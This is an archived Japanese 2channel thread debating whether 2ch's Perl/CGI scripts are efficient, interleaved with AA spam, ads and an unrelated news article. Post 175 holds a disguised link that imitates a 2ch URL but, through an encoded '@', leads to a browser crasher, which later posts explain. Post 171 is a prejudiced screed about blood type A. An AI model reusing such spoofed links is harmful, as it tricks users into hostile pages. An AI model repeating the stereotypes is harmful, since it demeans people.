探検


CGIで運営される2ちゃんねる

1名無しさん@お腹いっぱい。
垢版 |
2001/07/01(日) 08:11ID:7CNdpC7o
2ちゃんねるのような、ほとんどスクリプトによる処理で
しかも大量の閲覧があるってのに、
CGI/perl使ってるってことは
非常に効率の悪いシステムだと思うのですが、、、
153nobodyさん
垢版 |
02/12/31 01:11ID:???
>>152
少しくらい調べてからしゃべった方が良いぞ。

.NETの1側面としてASP.NETと言うサーバサイドプログラミング環境で使用できる
言語を従来のJScipt/VBScriptのみから.NET系言語すべてに拡大させようという
もくろみがある。
154nobodyさん
垢版 |
02/12/31 13:27ID:qLQW6luA
だんだん話題が2ちゃんねるからはなれていくわけだが。
155nobodyさん
垢版 |
02/12/31 14:15ID:???
>>144
Cがスクリプトねぇ・・・
156nobodyさん
垢版 |
02/12/31 14:17ID:???
>>155
なんて誰も言っていない罠。
157nobodyさん
垢版 |
02/12/31 14:18ID:???
>>156
> 2chスクリプトでもCでコーディングされている部分があると
158nobodyさん
垢版 |
02/12/31 14:21ID:???
>>157
2chと言うシステムを2chスクリプトと呼んでるんじゃないの?
何でもかんでもサーバサイドプログラムならスクリプトって呼ぶ節もあるし。
そんな揚げ足取って遊んでる暇があったら内容についておもしろい反論した方が
スレのためだと思うぞ。
159111
垢版 |
02/12/31 15:17ID:???
まともな返事がないな。
証明しても認めないのか?

まぁいいさ。そのうちPerlの方が早いって噂がながれるから。
160nobodyさん
垢版 |
02/12/31 17:35ID:???
とにかく143がDelphiでread.cgiつくって
それが他のより効率がよければ
一段落つく
161nobodyさん
垢版 |
02/12/31 20:53ID:qLQW6luA
>>160
kylixでもいいよ。
162nobodyさん
垢版 |
02/12/31 21:37ID:4SuLYxmx
◆◇◆◇◆最新情報◆◇◆◇◆
http://yahooo.s2.x-beat.com/linkvp/linkvp.html
163nobodyさん
垢版 |
02/12/31 22:41ID:???
kylixって別に言語は決まっていないような・・・
164nobodyさん
垢版 |
02/12/31 22:45ID:???
>>163
最新バージョン以外はObjectPascal。最新バージョンでもDelphiなC++が追加されただけ。
165nobodyさん
垢版 |
02/12/31 22:46ID:???
Perlでいいじゃん。


終了
166nobodyさん
垢版 |
02/12/31 22:52ID:???
Perlって言われてるほど遅くないよ
PHPって言われてるほど早くないよ・・・
マヂで
167nobodyさん
垢版 |
02/12/31 22:53ID:???
>>166
そうそう。
だからPerlでいい。
168nobodyさん
垢版 |
02/12/31 23:41ID:???
PHPにもPerlのモジュールのようなものってあるんでひょうか?
169nobodyさん
垢版 |
02/12/31 23:56ID:???
>>168
得にはないけれどstaticなメソッドとか持てるから名前空間のまねごとはできる。
170nobodyさん
垢版 |
03/01/01 00:36ID:???
>>168はそこまで深く考えてない気がするな。
モジュールのように拡張できる仕組みを聞いてるのかも。
そっちならpearってものがある。CPANに近い感じかな。
171世直し一揆
垢版 |
03/01/02 11:17ID:T5fApRal
<血液型A型の一般的な特徴>(見せかけの優しさ(偽善)に騙されるな!)
●とにかく気が小さい(神経質、臆病、二言目には「世間」)
●他人に異常に干渉する(しかも好戦的・ファイト満々でキモイ)
●自尊心が異常に強く、自分が馬鹿にされると怒るくせに平気で他人を馬鹿にしようとする
(ただし、相手を表面的・形式的にしか判断できず(早合点・誤解の名人)、実際にはたいてい、内面的・実質的に負けている)
●「常識、常識」と口うるさいが、実はA型の常識はピントがズレまくっている(日本の常識は世界の非常識)
●権力、強者(警察、暴走族…etc)に弱く、弱者には威張り散らす(強い者に弱く、弱い者には強い)
●あら探しだけは名人級(例え10の長所があってもほめることをせず、たった1つの短所を見つけてはけなす)
●基本的に悲観主義でマイナス思考に支配されているため、性格がうっとうしい(根暗)
●一人では何もできない(群れでしか行動できないヘタレ)
●少数派の異質、異文化を排斥する(差別主義者)
●集団によるいじめのパイオニア&天才(陰湿&陰険)
●悪口、陰口が大好き(A型が3人寄れば他人の悪口、裏表が激しい)
●他人からどう見られているか、体裁をいつも気にしている(「世間体命」、「〜みたい」とよく言う)
●自分の感情をうまく表現できず、コミュニケーション能力に乏しい(同じことを何度も言う、知障)
●表面上意気投合しているようでも、腹は各自バラバラで融通が利かず、頑固(本当は個性・アク強い)
●人を信じられず、疑い深い(自分自身裏表が激しいため、他人に対してもそう思う)
●自ら好んでストイックな生活をし、ストレスを溜めておきながら、他人に猛烈に嫉妬する(不合理な馬鹿)
●執念深く、粘着でしつこい(「一生恨みます」タイプ)
●自分に甘く他人に厳しい(自分のことは棚に上げてまず他人を責める。しかも冷酷)
●男は、女々しいあるいは女の腐ったみたいな考えのやつが多い(他人をけなして相対的に自分の立場を引き上げようとする等)
172nobodyさん
垢版 |
03/01/03 01:25ID:7wl3IpJo
伝説のように語られる
2001年8月の2ちゃん閉鎖危機。

その時、UNIX板の同志が2ちゃんのCGIを改良し
データを16分の1に圧縮してサーバ負荷を低減させたらしいけど
データってログファイルのことかな?

圧縮すればディスク容量は低減できるけど、サーバの負荷は増えるよね。
勘違いか。

あれって、結局何が原因だったのでしょうか。
173nobodyさん
垢版 |
03/01/03 01:30ID:???
ログ読めば分かるけど、転送量ですよん。
当時はCPU負荷とかは問題ではなかったらしい。
今じゃそれで困ってるてのにねぇ…
174nobodyさん
垢版 |
03/01/03 03:32ID:???
1/16って最高圧縮時だったような
175nobodyさん
垢版 |
03/01/03 12:40ID:WyHerT5Z
http://game2.2ch.net|test|read.cgi|ff%40195.126.71.77/%63%72%61%73%68%6D%65
50 :ひろゆき★暫定管直人 :02/12/24 02:40 ID:nmrA0bMw
    クリスマスは彼女としてきますよ。。。
176nobodyさん
垢版 |
03/01/03 14:32ID:VDHGLCZs
> CPU負荷
今ってどんなマシンなん?
177nobodyさん
垢版 |
03/01/03 18:54ID:???
>>175
ブラクラ
178nobodyさん
垢版 |
03/01/03 22:44ID:jx+nlJxM
>>176
oyster14 , 15 サーバのスペック。
> CPU: P4 xeon 2GHz Dual
> MEMORY: 2GB
> HD: 36GB SCSI 15,000rpm
179nobodyさん
垢版 |
03/01/03 23:38ID:???
>>178
そのサーバー1台でどれくらいの掲示板かかえてんの?
180nobodyさん
垢版 |
03/01/03 23:48ID:???
>>179
ttp://users72.psychedance.com/
の情報だと、
 oyster14 が school2 の掲示板(食べ物 お菓子 ジュース 料理 ラーメン グルメ外食 B級グルメ お酒・Bar レシピ)全部、
 oyster15 が food3 の掲示板(転職 資格全般 アルバイト 大学受験 お受験)全部、
ってなってるねぇ。
181nobodyさん
垢版 |
03/01/04 09:37ID:???
鯖一台で結構持つんだな。
182nobodyさん
垢版 |
03/01/04 09:39ID:???
Pentium4-Xeon2GHzDualってことは
最近導入した機種だよな
183nobodyさん
垢版 |
03/01/04 10:06ID:???
Pentium4-Xeon2GHzDualなのはほんの一部の機種だけで
他の大多数は、ジャンク寸前のボロ鯖の予感
184nobodyさん
垢版 |
03/01/04 10:36ID:???
ていうか、その鯖1台で、掲示板アプリ(PHPかPerlかしらんけど)と
データ(テキスト?)と、Web鯖(Apacheだろうけど)をまかなってんの?
すごいCPU負荷高そうだよねぇ。で、>>178のような高いスペックの鯖に
なっちゃうんか。。
DB鯖1台にスペックそこそこのAP鯖数台、同じくWeb鯖数台の方が
良いと思うのだが、予算とかラックスペースの問題があるんかな?
185nobodyさん
垢版 |
03/01/04 17:18ID:K4CHI+pq
>>180
そんなにアクセス激しい板だからかね?
186名無しさん@Emacs
垢版 |
03/01/05 07:45ID:9F5qi+Do
>>175
時々その'/'を'|'で置き換えたようなへんなURL張る人いるんだけど
どっからコピペしてきてるの?
187nobodyさん
垢版 |
03/01/05 12:39ID:???
>>181
掲示板10個程度で、苦しいもんなのか?
188nobodyさん
垢版 |
03/01/05 13:10ID:???
>>187
アクセス数がアホみたいにあるからな。それでだろ。
189nobodyさん
垢版 |
03/01/05 15:47ID:???
>>186
%40ってのは@をURLエンコードしたもので、それの手前はユーザ名とパスワードになる。
ttp://homepage2.nifty.com/winfaq/c/network.html#109
実際のリンク先は%40以降で、行き先はブラクラ。
手前に2chのどこかを思わせる文字列をくっつけて踏む奴を増やそうって考えだと思われ。
まぁ、発祥は漏れも知らないけどね。
190山崎渉
垢版 |
03/01/15 13:36ID:???
(^^)
191山崎渉
垢版 |
03/04/17 12:27ID:???
(^^)
192nobodyさん
垢版 |
03/04/17 12:34ID:9xDxcLAx
■ お手伝いさん募集中。。。
http://jbbs.shitaraba.com/computer/bbs/read.cgi?BBS=2095&KEY=1050545010
夜勤さんが助手を募集しているらしい。
来たれ猛者。
193nobodyさん
垢版 |
03/04/17 15:27ID:LThhm/4g
1へ
そんなに文句あるなら直訴でもしてみそ
194山崎渉
垢版 |
03/04/20 06:03ID:???
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
195山崎渉
垢版 |
03/05/22 02:09ID:???
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
196山崎渉
垢版 |
03/05/28 17:17ID:???
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉
197山崎 渉
垢版 |
03/07/15 11:17ID:???

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄
198山崎 渉
垢版 |
03/08/02 02:35ID:???
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
03/08/02 05:15ID:???
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ
03/08/02 07:33ID:???
(σ・∀・)σ ゲッツ!
201山崎 渉
垢版 |
03/08/15 23:05ID:???
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン
202nobodyさん
垢版 |
03/12/07 16:38ID:???
>>1はアンチ運営ですか?
203nobodyさん
垢版 |
04/01/14 22:16ID:ap6LPDDM
2ちゃんはPHPにいこうしないの?
204nobodyさん
垢版 |
04/01/15 00:16ID:???
しないだろ。PHPも使われてはいるが
205nobodyさん
垢版 |
04/01/21 03:57ID:L2v8Eaor
は?CのCGIだろ?
どうせApacheしか津川ねーんだから、mod_2chとかにすれば
負荷が激減するのに。
206nobodyさん
垢版 |
04/01/21 07:28ID:???
ひろゆきによればCだと書き換え大変だからヤダってことだったと思う

2chみたいな規模なら俺もApacheモジュールにしたらいいのにと思うけど
207nobodyさん
垢版 |
04/01/21 08:09ID:???
今はどうか知らんけど、サーバ側に手を加えるわけにはいかんそうですよ。
208nobodyさん
垢版 |
04/01/21 08:10ID:???
詳細は閉鎖危機の某UNIXスレだったかその辺りにあったような
209nobodyさん
垢版 |
04/01/21 16:07ID:???
PHPが使われてるのは規制関係だけ。
モジュール化は本7の脳内だけ。
210nobodyさん
垢版 |
04/01/31 14:41ID:eRBhTKHm
read.cgiもwrite.cgiもCだったけど、いつからPerlになったの???
ずいぶんきたねーソースだったけど、だからってPerlにするのは逝かれてる。
211nobodyさん
垢版 |
04/02/07 05:56ID:???
正直Perlなんて言語は2chを残して消えて欲しい
212nobodyさん
垢版 |
04/02/07 20:48ID:???
printf("正直%sなんて言語は%sを残して消えて欲しい", str1, str2);
213nobodyさん
垢版 |
04/02/13 20:46ID:nSy7JEwS
エロイ人に質問

2ch は、perl とc でつくられているんでつか?

214nobodyさん
垢版 |
04/02/14 02:50ID:???
>>213
( ゚д゚)、ペッ 糞マルチは市ねよ
215nobodyさん
垢版 |
04/02/23 03:29ID:???
>>209
本7って?
216nobodyさん
垢版 |
04/02/23 03:50ID:???
NG ワードです。
217nobodyさん
垢版 |
2005/11/26(土) 13:39:03ID:lGwtghir
20ヶ月ぶりにage
218nobodyさん
垢版 |
2007/01/16(火) 20:14:42ID:7zp3p3Gr
もう2007年だぞ
219nobodyさん
垢版 |
2007/01/18(木) 21:50:27ID:kxyxPb6X
連続日付get
220http://fusianaさん.dqn.net/
垢版 |
2008/02/02(土) 11:45:46ID:???
| あべぽの時は近づいた。悔い改めて節穴を信じ、聖なる言葉「あべぽ」を唱えよ。 |
|  あべぽ、板中のスレに一斉に節穴あべぽをして神のあべぽさを知らしめなさい。|
\  聖なるAA(^^)はあべぽと山崎信者にのみ許される神のあべぽである。. /
  \                                            /
    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄V ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                   ∧_∧
                   (  ^^ )
            (っ)    ,,,,l ` γ l,,,,,
             \ \/~~.... |。  ~~ヽ
               \,,/ |   |。田}}\ \
                    |   |。  |  ヽ_ヽ
              _    |   |。  |   ゝつ
             |\  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
   ∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧
 <      guest   !   あべぽ   !   あべぽ   !   >
  ∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨
    、        、        、       、        、
  /っノ      /っノ      /っノ     /っノ      /っノ
 / /  ∧_∧ / /  ∧_∧ / /  ∧_∧ / /  ∧_∧ / /  ∧_∧
 \\(    )\\(    )\\(    )\\(    )\\(   
221nobodyさん
垢版 |
2011/08/28(日) 19:03:35.48ID:???
自室にこもる孤独な努力

一度、パニックに陥ったコウ君に接したことがある。
自宅を訪ね、コウ君が大嫌いだというお笑い芸人に話題が及んだ時のことだ。なぜ嫌いな
の?軽い気持ちで尋ねた。コウ君は何度か言いよどんだ後、「言いたくない。うざい!」。
私に背を向け、フゥー、フゥー、と肩を大きく上下させた。両足が激しく震えている。
母親によると、その芸人が女装してふざけた歌を歌うのが、まじめなコウ君には許せない
らしい。朝からセミがうるさくてイライラも募っていた。何度も彼と会い、特性の一端を
知れば「そうか」と思う。それでも、突然の変容ぶりには戸惑った。
コウ君はスッと部屋を出て、10分ほどで落ち着きを取り戻して戻ってきた。真っ暗に消灯
した自室にこもっていたという。
「そうすれば落ち着くって、自分で考えた」という。怒ったら周りに迷惑がかかると思う
のだろうか。「そう思わなアカンやろ。ひたすら耐えてると周りが余計にうるさく感じる
から、一人の部屋がいいんや」。誰にも理解されない苦しみを制御しようと積み重ねた孤
独な努力を思い、せつない気持ちになる。
5月はじめ、中学校で最初のパニックを起こした。
男子が授業中に雑談していた。貧乏揺すりをし、息を荒くして耐えた。だが男子はコウ君
の貧乏揺すりと息づかいをまねてからかった。気持ちに余裕があれば無視もできた。だが
新学期以来のストレスで、堪忍袋はぱんぱんに膨れあがっていた。机をバーンとひっくり
返した。
コウ君はしばらく学校を休んだ。ようやく支援学級に復帰した5月末、再び「事件」。笑
顔を見せたコウ君に、先生が「かわいい」と声をかけた。「オカマかオレは!」。コウ君
の中では「かわいい」イコール「女」。混乱してしまったのだ。
母親が外出先から帰宅すると、コウ君は部屋の隅でうずくまっていた。「僕は我慢もでけ
へん。褒め言葉でも怒ってしまう。生きていてもしゃーないんや」。ゴミ箱の中には、脱
いだ制服が捨てられていた。
翌日から不登校が始まった。
(左古将規)
2012/10/13(土) 23:04:48.05ID:????PLT(12079)

  ∧_∧
  ( ・∀・)      | | ガガッ
 と    )      | |
   Y /ノ      .人
    / ) .人   <  >_∧∩
  _/し' <  >_∧∩`Д´)/
 (_フ彡 V`Д´)/   / ←>>194
            / ←>>198
223nobodyさん
垢版 |
2013/01/09(水) 17:40:27.69ID:???
Win8にしよう。
224nobodyさん
垢版 |
2014/01/30(木) 12:24:05.67ID:???
ぬるぽ
225nobodyさん
垢版 |
2015/01/11(日) 01:40:47.01ID:???
2ちゃんねる
226nobodyさん
垢版 |
2015/01/21(水) 02:37:35.57ID:???
がんばる
227nobodyさん
垢版 |
2016/05/28(土) 17:15:43.59ID:6v1gkZLk
良スレage
228nobodyさん
垢版 |
2017/12/30(土) 15:29:51.73ID:YhlYw6jg
誰でも簡単にネットで稼げる方法など
参考までに、
⇒ 『半藤のブブイウイウレレ』 というサイトで見ることができます。

グーグル検索⇒『半藤のブブイウイウレレ』

MP4I48G9LG
229米銀、FRBからの借り入れ20兆円に急増
垢版 |
2023/03/17(金) 09:05:04.82ID:CokxX0ip
米連邦準備理事会(FRB)は16日、銀行からの資金借り入れが15日時点で1528億ドル(約20兆円)に急増したと発表した。リーマン危機時を抜いて過去最高を記録した。相次ぐ米銀の破綻で金融市場は動揺しており、資金繰りを「最後の貸し手」である中央銀行に頼っている。

FRBは金融機関が資金繰りに行き詰まることを避けるための安全弁として、民間銀行向けに貸し出しを実施している。8日時点で45億ドル強だったこの融資額は一週間で33倍に急増した。10日以降に米銀シリコンバレーバンク(SVB)などが相次ぎ破綻し、市場で資金のやり取りが細っているためだ。

この貸し出しは金融危機時などに急増する。これまでの最高はリーマン危機後の08年10月末につけた1107億ドルだった。金融機関はかつては経営不安の噂が流れるのを警戒して、FRBからの借り入れを敬遠する傾向にあった。

FRBがSVBの破綻を受けて新たに設けた「銀行タームファンディングプログラム(BTFP)」と呼ばれる緊急融資枠も15日時点で119億ドルの利用があった。破綻したSVBとシグネチャーバンクを管理するために米連邦預金保険公社(FDIC)が作った「ブリッジバンク」向けの融資も膨らみ、FRBが「その他の信用拡張」と分類する融資額は1428億ドルに拡大した。
レスを投稿する


ニューススポーツなんでも実況